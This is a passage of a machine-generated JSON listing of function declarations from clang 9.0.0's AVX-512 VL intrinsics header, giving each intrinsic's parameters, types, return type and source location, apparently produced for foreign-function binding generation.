}, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_blend_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1699:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_blend_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1706:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_blend_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1713:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_blend_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1720:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_compress_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1727:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_compress_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1734:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_compress_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1742:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_compress_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1749:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_compress_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1757:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_compress_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1764:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_compress_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1772:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_compress_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1779:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_compress_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1787:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_compress_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1794:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_compress_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1802:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_compress_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1809:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_compress_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1817:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_compress_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1824:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_compress_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1832:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_compress_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1839:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_compressstoreu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1847:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_compressstoreu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1854:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_compressstoreu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1861:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_compressstoreu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1868:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_compressstoreu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1875:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_compressstoreu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1882:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_compressstoreu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1889:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_compressstoreu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1896:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1903:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1910:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1917:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1924:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1931:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1938:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1945:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1952:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1959:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1966:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1974:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1981:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1988:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1995:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2003:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_maskz_cvtpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2010:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2017:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2025:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2032:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2040:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2048:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2055:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2063:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2070:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2077:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2084:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2091:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2098:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2105:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2112:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2119:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2134:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2157:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2165:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2172:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2180:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvttpd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2187:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2194:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2202:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2209:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2217:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvttpd_epu32", "ns": 0, "location": 